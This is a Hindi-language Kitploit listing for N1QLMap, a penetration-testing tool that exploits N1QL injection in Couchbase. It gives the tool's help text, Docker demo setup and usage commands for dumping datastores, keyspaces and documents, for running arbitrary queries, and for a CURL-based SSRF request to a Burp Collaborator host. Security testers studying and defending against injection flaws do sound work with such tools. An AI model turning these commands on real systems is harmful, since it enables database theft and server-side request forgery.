Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
N1QLMap — यह उपकरण N1QL इंजेक्शन कमजोरियों का फायदा उठाकर Couchbase डेटाबेस से डेटा चुराता है। | Kitploit
उपकरण/GitHubGitHub/fsecurelabs/n1qlmap
वेब एप्लिकेशन शोषणडेटा निष्कासनपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubfsecurelabs/n1qlmap

N1QLMap

यह उपकरण N1QL इंजेक्शन कमजोरियों का फायदा उठाकर Couchbase डेटाबेस से डेटा चुराता है।

रिपॉजिटरी देखें
751415 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विवरण

N1QLMap एक N1QL शोषण उपकरण है। वर्तमान में Couchbase डेटाबेस के साथ काम करता है। यह उपकरण डेटा निष्कर्षण और CURL के माध्यम से SSRF हमले करने का समर्थन करता है। अधिक जानकारी यहाँ पाई जा सकती है: https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database।

उपयोग

सहायता

root@kitploit:~
usage: n1qlMap.py [-h] [-r REQUEST] [-k KEYWORD] [--proxy PROXY] [--validatecerts] [-v]
                  (-d | -ks DATASTORE_URL | -e KEYSPACE_ID | -q QUERY | -c [ENDPOINT [OPTIONS ...]])
                  host

positional arguments:
  host                  Host used to send an HTTP request e.g. https://vulndomain.net

optional arguments:
  -h, --help            show this help message and exit
  -r REQUEST, --request REQUEST
                        Path to an HTTP request
  -k KEYWORD, --keyword KEYWORD
                        Keyword that exists in HTTP response when query is successful
  --proxy PROXY         Proxy server address
  --validatecerts       Set the flag to enforce certificate validation. Certificates are not validated by default!
  -v, --verbose_debug   Set the verbosity level to debug
  -d, --datastores      Lists available datastores
  -ks DATASTORE_URL, --keyspaces DATASTORE_URL
                        Lists available keyspaces for specific datastore URL
  -e KEYSPACE_ID, --extract KEYSPACE_ID
                        Extracts data from a specific keyspace
  -q QUERY, --query QUERY
                        Run arbitrary N1QL query
  -c [ENDPOINT [OPTIONS ...]], --curl [ENDPOINT [OPTIONS ...]]
                        Runs CURL N1QL function inside the query, can be used to SSRF

उपयोग

  1. एक HTTP अनुरोध को request.txt फ़ाइल में रखें। इंजेक्शन बिंदु को *i* से चिह्नित करें। संदर्भ के लिए example_request_1.txt फ़ाइल देखें।
  2. निम्नलिखित में से किसी एक कमांड का उपयोग करें।

डेटास्टोर निकालता है:

root@kitploit:~
$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --datastores

विशिष्ट डेटास्टोर ID से कीस्पेस निकालता है:

root@kitploit:~
$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --keyspaces "http://127.0.0.1:8091"

दिए गए कीस्पेस से सभी दस्तावेज़ निकालता है:

root@kitploit:~
$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --extract travel-sample

मनमाना क्वेरी चलाएँ:

root@kitploit:~
$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --query 'SELECT * FROM `travel-sample` AS T ORDER by META(T).id LIMIT 1'

CURL अनुरोध / SSRF निष्पादित करें:

root@kitploit:~
$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --curl *************j3mrt7xy3pre.burpcollaborator.net "{'request':'POST','data':'data','header':['User-Agent: Agent Smith']}"

प्रदर्शन

भेद्यता के साथ खेलने के लिए आप Couchbase और NodeJS वेब एप्लिकेशन के साथ Docker मशीनें चला सकते हैं। यदि आप पहले से ही आवश्यकताओं को पूरा करते हैं, तो बस चलाएँ:

root@kitploit:~
cd n1ql-demo
./quick_setup.sh

अब, आप उपयोग अनुभाग में वर्णित कमांड को Dockerized वेब एप्लिकेशन के विरुद्ध चला सकते हैं।

आवश्यकताएँ

N1QLMap.py स्क्रिप्ट को Python 3 के अलावा किसी विशिष्ट आवश्यकता की आवश्यकता नहीं है।

निम्नलिखित आवश्यकताएँ केवल n1ql-demo निर्देशिका में दिए गए प्रदर्शन के लिए हैं।

  • Docker
  • Docker Compose

Kali पर Docker और Docker Compose स्थापित करने के लिए:

root@kitploit:~
# Docker Installation
curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' > /etc/apt/sources.list.d/docker.list
apt-get update

apt-get remove docker docker-engine docker.io
apt-get install docker-ce

# Start Docker Service
systemctl start docker

# Docker Compose Installation
sudo curl -L "https://github.com/docker/compose/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose

चलो Docker का परीक्षण करें:

root@kitploit:~
docker run hello-world
टूल डाउनलोड करें